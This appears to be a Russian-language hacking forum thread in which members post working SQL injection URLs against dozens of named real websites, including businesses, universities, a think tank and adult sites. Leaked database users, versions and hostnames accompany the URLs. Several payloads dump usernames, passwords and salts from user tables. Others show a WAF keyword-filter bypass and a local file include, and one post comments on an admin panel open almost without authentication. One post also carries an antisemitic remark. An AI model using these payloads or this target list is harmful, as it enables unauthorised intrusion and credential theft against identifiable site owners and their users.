SQL Инъекции

[email protected];u36801;5.0.90-log

gornitsaru@localhost;gornitsaru;5.0.26-log

 

Code:

http://www.visoflora.com/index.php?option=com_visoflora&task=grainevariete&id=-67+UNION+SELECT+1,2,3,4,5,6,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54%20from%20jos_users--&Itemid=10

Username: visofloracom@localhost
Version: 5.0.51a-24+lenny5-log
Database: visofloracom

Google PR: 5 GooglePage: 1,060,000

Joomla

 

silverspoons@localhost;silverspoons;5.1.54-1ubuntu41

 

Code:

http://hpbikes.com/news.php?id=74+and+0+UNION+SELECT+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12+--+
http://www.sncorp.com/press_more_info.php?id=468+and+0+UNION+SELECT+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11+--+
http://www.rfidjournalevents.com/virtual_agenda.php?eid=9'+and+0+UNION+SELECT+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13+--+
http://www.profitchoice.com/webdir/dir_display.php?cat_id=13'+and+0+UNION+SELECT+concat_ws(0x3a,user(),version(),database())+--+
http://www.theshiva.net/resources.php?category_id=19+and+0+/*!UNION*/+/*!SELECT*/+concat_ws(0x3a,user(),version(),database())+--+
http://www.synchronica.com/p/announcement.php?id=42+and+0+UNION+SELECT+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6+--+
http://www.amtelnet.com/news/newsarticle.php?id=800537967+and+0+/*!UNION*/+/*!SELECT*/+1,2,3,4,5,6,concat_ws(0x3a,user(),version(),database()),8,9,10,11,12,13,14,15,16,17,18,19,20,21+--+
http://www.tarksheel.com/articles.php?aid=5+and+0+UNION+SELECT+1,2,3,4,concat_ws(0x3a,user(),version(),database()),6,7,8,9,10
http://www.sussexmedicalchambers.co.uk/articles.php?aid=15'+and+0+UNION+SELECT+1,2,3,4,5,6,concat_ws(0x3a,user(),version(),database()),8+--+
http://www.spinsnap.com/articles.php?aid=88+and+0+UNION+SELECT+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11,12+--+
http://www.sotder.org/health_articles.php?aid=665+and+0+UNION+SELECT+1,2,concat_ws(0x3a,user(),version(),database())+--+
http://www.seomanualsubmission.com/seo-link-building-articles.php?aid=7+and+0+/*!UNION*/+/*!SELECT*/+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12+--+
http://www.pongworld.com/articles/articles.php?aid=21+and+0+UNION+SELECT+1,concat_ws(0x3a,user(),version(),database()),3,4,5+--+

 

Code:

http://www.antibiotic.ru/news.php?y=2011 or 1 group by concat(version(),floor(rand(0)*2)) having min(0) or 1+--+

тиц 1400, pr 5

 

Code:

http://www.chale.ru/pts/admin/index.php?action=edit&categoryID=1&page=&link=0 union select 1,2,3,user(),5,6,7 -- a

Админка доступна почти без авторизации.

 

А веть я хотел купить у них палатку))))

http://www.lodki-palatki.ru/article.php?articleId=-19%20union%20select%20concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),2,3,4+--

5.0.92-log:lodkipa9_web@localhost:lodkipa9_webortbld-freebsd7.4

 

Cпортивный видеопортал Екатеринбурга.

Code:

http://www.uralvideosport.ru/news.php?num=1488-14.88+UNION+SELECT+1,CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),3,4,5,6,7,8,9,10-- 

Внутри есть БД с информацией для подключения к FTP

Database Version: 5.0.32-Debian_7etch8-log
Database name: u6378
User name: root@localhost

ТИЦ: 150
PR: 4

Компания ОМЕГА - разработчик программного обеспечения.

Code:

http://www.omega.ru/pressreleases/view_relise.php?id=1-1.1+UNION+SELECT+1,CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),3,4,5,6,7,8,9,10,11--

Эти ребята делают ПО для СУБД ^^

Database Version: 4.0.27
Database name: news
User name: [email protected]

ТИЦ: 375
PR: 3

ЧТУП "ПрофЭлектроника" - Поставщик систем безопасности в Беларуси.

Code:

http://www.pel.by/video_price_t.php?ID=1-0.1+UNION+SELECT+1,2,CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),4,5,6,7,8-- 

Database Version: 5.0.92-community
Database name: sobby_sob2
User name: sobby_sob2@localhost

ТИЦ: 10
PR: 3

Институт Катона — американская исследовательская и просветительская организация.

Code:

http://www.cato.org/pressroom.php?display=news&id=1-1.1+UNION+SELECT+CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),2,3,4,5--

Database Version: 5.1.56-rs
Database name: cato
User name: [email protected]

ТИЦ: 300
PR: 7

Расово еврейский сайт.

Code:

http://www.torah.org/qanda/seequanda.php?id=666-666.666+UNION+SELECT+1,2,3,AES_DECRYPT(AES_ENCRYPT(CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),0x71),0x71),5,6,7,8,9,10,11--

Database Version: 4.1.11-Debian_etch1-log
Database name: jln
User name: [email protected]

ТИЦ: 40
PR: 6

Mohammad Ali Jinnah University.

Code:

http://jinnah[COLOR=Red].edu[/COLOR]/academic.php?id=1-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),13,14,15,16,17,18,19,20-- 

File_Priv = Y

Но там уже кто-то тусовался ...

Database Version: 5.5.15
Database name: maju
User name: root@localhost

ТИЦ: 0
PR: 6

 

http://www.fap.pdx.edu/floorplans/detail.php?buildingID=-13'+union+select+1,2,3,4,5,6,7,version(),9,0,11,12,13,14,15,16--+

Database Version: 5.0.77
Database name: fapws
User name: [email protected]

 

какой то там университет Брюселя внутри таблы экзаменов за 2012 и т д (админку было искать лень)

Code:

http://huis.vub.ac.be/lessenlees.php?lescode=-117+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+RageUsers+limit+1,1--+

 

тИЦ:140

Вывод в соурсе:

 

в админку не пускает((( не нравится мой айпи((( http://101rabota.ru/admin/

http://www.101rabota.ru/allrez.php?showgr=-5+union+select+1,concat(login,0x3a,password),3333,4,5+from+users_admin+limit+0,1+--+

 

Code:

http://www.uveitisclinicaltrials.com/index.php?option=[COLOR=Green]com_sl[/COLOR]&view=form&site_id=-30'+union+select+concat_ws(0x3a,username,password,usertype,0x4861636b6564206279204572656565)+from+jos_users+limit+0,1--+f

 

SQL INJECTION (error-based) && Local File Include

Для проведения SQL Inj необходимо посылать кавычку не url-кодируя ее в %27.
В бд идет $_SERVER['REQUEST_URI'], так что ваши параметры не декодируются автоматически.
INSERT запрос.

Code:

http://www.zvuk.uu.ru/catalog/article.php?file=ololosha'or%28select/**/count%28*%29/**/from/**/%28select/**/1/**/union/**/select/**/2/**/union/**/select/**/3%29x/**/group/**/by/**/concat%28version%28%29,floor%28rand%280%29*2%29%29%29and'

version(): 4.1.15-log
user(): [email protected]

SAFE MODE = On
Инклуд картинки для примера:

Code:

http://www.zvuk.uu.ru/catalog/article.php?file=../../../catalog/images/logo.gif

 

Code:

http://www.ballarat.com/bookingservice/booking_request.php?id=-664+UNION+SELECT 1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127+from+information_schema.tables+limit+16,1+--+

 

Code:

http://www.justhotgayporn.com/mobile/search/?q=1')and(select+1+from(select+count(*),concat((select+concat_ws(0x3a,username,password,salt)+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)and('a'='a
http://www.toptrannysex.com/mobile/search/?q=1')and(select+1+from(select+count(*),concat((select+concat_ws(0x3a,username,password,salt)+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)and('a'='a
http://smoketube.tv/mobile/search/?q=1')and(select+1+from(select+count(*),concat((select+concat_ws(0x3a,username,password,salt)+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)and('a'='a
http://www.bukkakevideos.com/mobile/search/?q=1')and(select+1+from(select+count(*),concat((select+concat_ws(0x3a,username,password,salt)+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)and('a'='a
http://mobile.youngporngirlz.com/search/?q=1')and(select+1+from(select+count(*),concat((select+concat_ws(0x3a,username,password,salt)+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)and('a'='a
http://mobile.pornstarblitz.com/search/?q=1')and(select+1+from(select+count(*),concat((select+concat_ws(0x3a,username,password,salt)+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)and('a'='a
http://www.gay-bukkake.org/mobile/search/?q=1')and(select+1+from(select+count(*),concat((select+concat_ws(0x3a,username,password,salt)+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)and('a'='a
http://mobile.boinktube.com/search/?q=1')and(select+1+from(select+count(*),concat((select+concat_ws(0x3a,username,password,salt)+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)and('a'='a
http://www.justhotgayporn.com/mobile/search/?q=1')and(select+1+from(select+count(*),concat((select+concat_ws(0x3a,username,password,salt)+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)and('a'='a
http://www.publicdomaintube.com/mobile/search/?q=1')and(select+1+from(select+count(*),concat((select+concat_ws(0x3a,username,password,salt)+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)and('a'='a
http://www.standupcomedyspot.com/mobile/search/?q=1')and(select+1+from(select+count(*),concat((select+concat_ws(0x3a,username,password,salt)+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)and('a'='a
http://www.freepornmarttube.com/mobile/search/?q=1')and(select+1+from(select+count(*),concat((select+concat_ws(0x3a,username,password,salt)+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)and('a'='a

 

http://www.yuzhno-sakhalinsk.net/object.php?pg=2&type=-146%20union%20select%201,concat_ws(char(58),@@version,user(),database(),@@version_compile_os),3,4,5,6,7,8,9,10,11,12,13,14,15,16+--

5.1.41-log [email protected] tiba102_info portbld-freebsd7.2

 

Code:

http://www.blackco.net/modules.php?name=photo&u=Stalker%20XL&un=1&clan=BlackCompany'%20and%201=1+union+select%201,@@version,3,4,5,6,7,8,9,10%20--%20f&sex=1&level=7&align=

YOU ARE SLAPPED BY NUKECOPS BY USING 'union' INSIDE 'name=photo&u=Stalker%20XL&un=1&clan=BlackCompany%27%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10%20--%20f&sex=1&level=7&align='.
NUKECOPS, ох лол:
%0Aunion%0A

Code:

http://www.blackco.net/modules.php?name=photo&u=Stalker%20XL&un=1&clan=BlackCompany'%20and%201=1%0Aunion%0Aselect%201,@@version,3,4,5,6,7,8,9,10%20--%20f&sex=1&level=7&align=

 

В ТОПКУ

http://uanato.info/index.php?pokaz=-7690%20and%201=2%20union%20select%201,2,3,4,concat_ws(char(58),@@version,user(),database(),@@version_compile_os),6+--

4.1.22-standard-log ospuai_ospuai@localhost ospuai_nato pc-linux-gnu